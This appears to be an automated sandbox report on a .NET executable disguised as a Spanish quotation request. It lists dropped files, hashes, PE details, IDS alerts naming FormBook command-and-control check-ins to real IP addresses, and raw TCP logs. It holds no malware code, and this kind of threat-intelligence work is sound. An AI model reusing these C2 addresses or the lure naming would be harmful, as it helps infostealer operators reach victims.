                                                          MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                          SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                          SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                          SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                          Malicious:false
                                                          Preview:@...e................................................@..........

                                                          C:\Users\user\AppData\Local\Temp\1150d71

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\SecEdit.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1211596417522893
                                                          Encrypted:false
                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                          MD5:0AB67F0950F46216D5590A6A41A267C7
                                                          SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                          SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                          SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4m11nsi.hvv.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gu4qc4td.wrw.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwba0xjb.3hi.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxnufaz5.frq.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                          Download File
                                                          Process:C:\Windows\System32\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.296069439140736
                                                          Encrypted:false
                                                          SSDEEP:6144:441fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+2omBMZJh1VjE:11/YCW2AoQ0NiEowMHrVA
                                                          MD5:CFB0222D4F2976D364AF5E373B8D1B5A
                                                          SHA1:CCBBEA34FB963F6510075D798E3A2C9CA208E1AE
                                                          SHA-256:FC6F8135883BF82753EC62D39C9CC5F3EE22378CDF7E68F640646CBF156983C7
                                                          SHA-512:F0825794AF99D2EB691D2BA7C89FC67915B71CF68001A1FB87A2B6F11907F628E7799FBACD8B822D776A6048BA8DA780B617A73845C0C9195CC5965FEBECA704
                                                          Malicious:false
                                                          Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm6.}...................................................................................................................................................................................................................................................................................................................................................iK........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):4.923798534770572
                                                          TrID:
                                                          • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                          • Win64 Executable GUI (202006/5) 46.43%
                                                          • Win64 Executable (generic) (12005/4) 2.76%
                                                          • Generic Win/DOS Executable (2004/3) 0.46%
                                                          • DOS Executable Generic (2002/1) 0.46%
                                                          File name:z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
                                                          File size:3'079'318 bytes
                                                          MD5:ee557be5d5e16d9ea01241f09a19a87b
                                                          SHA1:e83e01dca3b3684e4f417b85bb4172dc635377e8
                                                          SHA256:e42b2065cd7683b0be8702853b309e09474f23ff67851cb8295686194006622a
                                                          SHA512:1ec2e18ae64ad994b279c4778c85d17df40d8de889d04c312a24b5bdf70fe1696f926016cc10e891e0fc2b0811d8f89b86d593ed6ff7a96b2c83d489bc3e1ce9
                                                          SSDEEP:12288:sR2wFm7mveI0f0bA1n4ADwC8ZjE8E27hs4k2BX48gUaZczMAjiCrj:s9m7my0bA2ADw7E8H73I8gU0czL7j
                                                          TLSH:21E5AF91B9474C97FC1212B1C8EAB9F010FD5D5B74F0520FEF657E2266B227E10A683A
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....x.f.........."...0..=............... ....@...... ..............................+./...`................................

                                                          File Icon

                                                          Icon Hash:1c188bc89a2c567b

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x400000
                                                          Entrypoint Section:
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66DF7809 [Mon Sep 9 22:34:49 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:

                                                          Entrypoint Preview

                                                          Instruction
                                                          dec ebp
                                                          pop edx
                                                          nop
                                                          add byte ptr [ebx], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax+eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x41ac2.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x3d920x3e003214833196d7a24a0e9efe3b119b78d6False0.6476814516129032data6.227977271663902IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x60000x41ac20x41c00fbc8b93323051f53ce0463e532967bf4False0.16046072956273763data4.2616249064478655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x61440x41428Device independent bitmap graphic, 253 x 512 x 32, image size 259072, resolution 3779 x 3779 px/m0.15837772723191573
                                                          RT_GROUP_ICON0x4756c0x14data1.2
                                                          RT_VERSION0x475800x358data0.4135514018691589
                                                          RT_MANIFEST0x478d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-09-11T22:02:49.640040+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049707217.70.184.5080TCP
                                                          2024-09-11T22:03:05.636449+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049709199.192.19.1980TCP
                                                          2024-09-11T22:03:08.481012+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049710199.192.19.1980TCP
                                                          2024-09-11T22:03:10.994616+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049711199.192.19.1980TCP
                                                          2024-09-11T22:03:13.538921+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049712199.192.19.1980TCP
                                                          2024-09-11T22:03:19.922113+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104971391.184.0.11180TCP
                                                          2024-09-11T22:03:22.474600+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104971491.184.0.11180TCP
                                                          2024-09-11T22:03:25.415863+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104971591.184.0.11180TCP
                                                          2024-09-11T22:03:27.843432+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104971691.184.0.11180TCP
                                                          2024-09-11T22:03:34.587409+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049717193.108.130.2380TCP
                                                          2024-09-11T22:03:37.144072+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049718193.108.130.2380TCP
                                                          2024-09-11T22:03:39.725437+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049719193.108.130.2380TCP
                                                          2024-09-11T22:03:42.170263+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049720193.108.130.2380TCP
                                                          2024-09-11T22:03:48.831925+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104972147.239.13.17280TCP
                                                          2024-09-11T22:03:51.334838+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104972247.239.13.17280TCP
                                                          2024-09-11T22:03:53.999481+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104972347.239.13.17280TCP
                                                          2024-09-11T22:03:56.395789+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104972447.239.13.17280TCP
                                                          2024-09-11T22:04:04.315698+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049725154.213.157.3280TCP
                                                          2024-09-11T22:04:06.849751+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049726154.213.157.3280TCP
                                                          2024-09-11T22:04:09.377961+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049727154.213.157.3280TCP
                                                          2024-09-11T22:04:31.770471+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049728154.213.157.3280TCP
                                                          2024-09-11T22:04:38.312957+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104972947.239.13.17280TCP
                                                          2024-09-11T22:04:40.850212+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104973047.239.13.17280TCP
                                                          2024-09-11T22:04:43.622662+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104973147.239.13.17280TCP
                                                          2024-09-11T22:04:45.907910+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104973247.239.13.17280TCP
                                                          2024-09-11T22:04:51.625711+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104973391.195.240.1980TCP
                                                          2024-09-11T22:04:54.155382+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104973491.195.240.1980TCP
                                                          2024-09-11T22:04:56.682829+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104973591.195.240.1980TCP
                                                          2024-09-11T22:04:59.223467+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104973691.195.240.1980TCP
                                                          2024-09-11T22:05:05.474119+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049737198.12.241.3580TCP
                                                          2024-09-11T22:05:08.549097+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049738198.12.241.3580TCP
                                                          2024-09-11T22:05:10.877753+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049739198.12.241.3580TCP
                                                          2024-09-11T22:05:13.260346+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049740198.12.241.3580TCP
                                                          2024-09-11T22:05:18.997419+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104974191.195.240.1980TCP
                                                          2024-09-11T22:05:21.677864+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104974291.195.240.1980TCP
                                                          2024-09-11T22:05:24.030304+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104974391.195.240.1980TCP
                                                          2024-09-11T22:05:26.773021+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104974491.195.240.1980TCP
                                                          2024-09-11T22:05:41.799821+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104974531.186.11.25480TCP
                                                          2024-09-11T22:05:44.974968+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104974631.186.11.25480TCP
                                                          2024-09-11T22:05:47.502944+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104974731.186.11.25480TCP
                                                          2024-09-11T22:06:09.903190+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104974831.186.11.25480TCP
                                                          2024-09-11T22:06:15.495299+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049749192.250.231.2880TCP
                                                          2024-09-11T22:06:18.793022+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049750192.250.231.2880TCP
                                                          2024-09-11T22:06:21.178494+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049751192.250.231.2880TCP
                                                          2024-09-11T22:06:23.712219+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049752192.250.231.2880TCP
                                                          2024-09-11T22:06:30.426319+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104975347.239.13.17280TCP
                                                          2024-09-11T22:06:32.914154+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104975447.239.13.17280TCP
                                                          2024-09-11T22:06:35.474379+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104975547.239.13.17280TCP
                                                          2024-09-11T22:06:37.962678+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104975647.239.13.17280TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 11, 2024 22:02:48.993223906 CEST4970780192.168.2.10217.70.184.50
                                                          Sep 11, 2024 22:02:48.998605967 CEST8049707217.70.184.50192.168.2.10
                                                          Sep 11, 2024 22:02:48.998692036 CEST4970780192.168.2.10217.70.184.50
                                                          Sep 11, 2024 22:02:49.001437902 CEST4970780192.168.2.10217.70.184.50
                                                          Sep 11, 2024 22:02:49.006355047 CEST8049707217.70.184.50192.168.2.10
                                                          Sep 11, 2024 22:02:49.639590025 CEST8049707217.70.184.50192.168.2.10
                                                          Sep 11, 2024 22:02:49.639919043 CEST8049707217.70.184.50192.168.2.10
                                                          Sep 11, 2024 22:02:49.639949083 CEST8049707217.70.184.50192.168.2.10
                                                          Sep 11, 2024 22:02:49.639985085 CEST8049707217.70.184.50192.168.2.10
                                                          Sep 11, 2024 22:02:49.640039921 CEST4970780192.168.2.10217.70.184.50
                                                          Sep 11, 2024 22:02:49.640070915 CEST4970780192.168.2.10217.70.184.50
                                                          Sep 11, 2024 22:02:49.645072937 CEST4970780192.168.2.10217.70.184.50
                                                          Sep 11, 2024 22:02:49.650005102 CEST8049707217.70.184.50192.168.2.10
                                                          Sep 11, 2024 22:03:04.990813971 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:04.995795965 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:04.996009111 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:04.998111963 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:05.003818035 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.636337996 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.636368036 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.636382103 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.636449099 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:05.636488914 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.636502981 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.636518002 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.636533022 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.636539936 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:05.636548996 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.636586905 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:05.636620998 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.636631966 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:05.636636019 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.636681080 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:05.641469955 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.641490936 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.641501904 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.641535044 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:05.689918041 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:05.727834940 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.728266001 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.728348017 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:05.728518963 CEST8049709199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:05.728575945 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:06.502602100 CEST4970980192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:07.522448063 CEST4971080192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:07.860690117 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:07.860899925 CEST4971080192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:07.863334894 CEST4971080192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:07.868254900 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.480758905 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.480775118 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.480792999 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.480806112 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.480817080 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.480833054 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.480844021 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.480855942 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.480866909 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.480879068 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.481012106 CEST4971080192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:08.485847950 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.485904932 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.485917091 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.485929966 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.485971928 CEST4971080192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:08.486010075 CEST4971080192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:08.573080063 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.573187113 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.573259115 CEST4971080192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:08.574011087 CEST8049710199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:08.574063063 CEST4971080192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:09.377629995 CEST4971080192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:10.396060944 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:10.401328087 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.401398897 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:10.403425932 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:10.408471107 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.408860922 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994544029 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994561911 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994582891 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994594097 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994606972 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994616032 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:10.994620085 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994632006 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994638920 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:10.994642973 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994657040 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994662046 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:10.994669914 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.994679928 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:10.994724035 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:10.999597073 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.999641895 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.999654055 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:10.999680996 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:11.049292088 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:11.081248999 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:11.081275940 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:11.081362963 CEST8049711199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:11.081475019 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:11.081475019 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:11.910669088 CEST4971180192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:12.927534103 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:12.932738066 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:12.932879925 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:12.934895039 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:12.939829111 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538608074 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538667917 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538703918 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538749933 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538784027 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538814068 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538846970 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538878918 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538911104 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538921118 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.538921118 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.538948059 CEST8049712199.192.19.19192.168.2.10
                                                          Sep 11, 2024 22:03:13.538969994 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.539041042 CEST4971280192.168.2.10199.192.19.19
                                                          Sep 11, 2024 22:03:13.543836117 CEST8049712199.192.19.19192.168.2.10
